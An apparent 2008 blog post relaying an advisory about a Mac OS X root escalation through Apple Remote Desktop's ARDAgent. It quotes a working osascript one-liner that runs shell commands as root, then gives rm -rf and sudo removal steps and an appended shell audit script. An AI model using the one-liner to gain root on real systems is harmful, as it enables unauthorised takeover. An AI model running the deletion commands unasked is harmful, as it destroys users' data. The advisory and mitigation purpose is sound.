
Mac OS X Root Escalation Through AppleScript

Posted on June 19th, 2008 at 8:20 by John Sinteur in category: News

[Quote:]

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching.

ARDAgent is part of Apple Remote Desktop. This only works for accounts where the user is logged on at the time of the exploit. Here’s how to fully remove it:

## Remove old components
rm -rf "/Applications/Remote Desktop.app"
rm -rf "/System/Library/CoreServices/ARD Agent.app"
rm -rf "/System/Library/CoreServices/RemoteManagement"
rm -rf "/Library/Receipts/RemoteDesktop"*

## Remove preferences
rm -rf "/Users/[ADMIN USER NAME]/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.ARDAgent.plist"
rm -rf "/Library/Preferences/com.apple.RemoteDesktop.plist"
rm -rf "/Library/Preferences/com.apple.RemoteManagement.plist"

## Remove local database
rm -rf "/var/db/RemoteManagement"

Or less destructively:


cd /System/Library/CoreServices/RemoteManagement/
sudo tar -czf ARDAgent.app.gz ARDAgent.app
sudo chmod 600 ARDAgent.app.gz
sudo rm -rf ARDAgent.app
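
To confirm on a given machine that the "less destructive" steps quoted above actually took effect, the following added example (not part of the quoted post) reports whether the ARDAgent.app bundle is still present, or has been replaced by the mode-600 archive. The function names and the ARD_DIR override are assumptions made for this sketch; the set-uid listing reflects the commonly reported root cause (ARDAgent shipping set-uid root), which the quoted text does not state.

```shell
#!/bin/sh
# Added example: audit the ARDAgent mitigation described in the quoted post.
# ARD_DIR defaults to the directory used in the post; override it for testing.
ARD_DIR="${ARD_DIR:-/System/Library/CoreServices/RemoteManagement}"

# Prints one of:
#   present         bundle still installed, mitigation not applied
#   archived        bundle removed, archive exists with mode 600
#   archived-loose  bundle removed, archive exists but is not mode 600
#   absent          neither bundle nor archive found (fully removed)
ardagent_state() {
    dir="${1:-$ARD_DIR}"
    app="$dir/ARDAgent.app"
    archive="$dir/ARDAgent.app.gz"

    if [ -e "$app" ]; then
        echo "present"
    elif [ -f "$archive" ]; then
        # -perm with no prefix is an exact match on the permission bits and
        # behaves the same with BSD (macOS) and GNU find.
        if [ -n "$(find "$archive" -prune -type f -perm 600)" ]; then
            echo "archived"
        else
            echo "archived-loose"
        fi
    else
        echo "absent"
    fi
}

# Lists any set-uid files remaining inside the bundle (empty output if none,
# or if the bundle is gone).
ardagent_setuid_files() {
    dir="${1:-$ARD_DIR}"
    [ -d "$dir/ARDAgent.app" ] || return 0
    find "$dir/ARDAgent.app" -type f -perm -4000
}

echo "ARDAgent state: $(ardagent_state)"
ardagent_setuid_files
```

Anything other than "archived" or "absent" means the bundle is still installed or the archive is readable more widely than the chmod 600 step intends.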
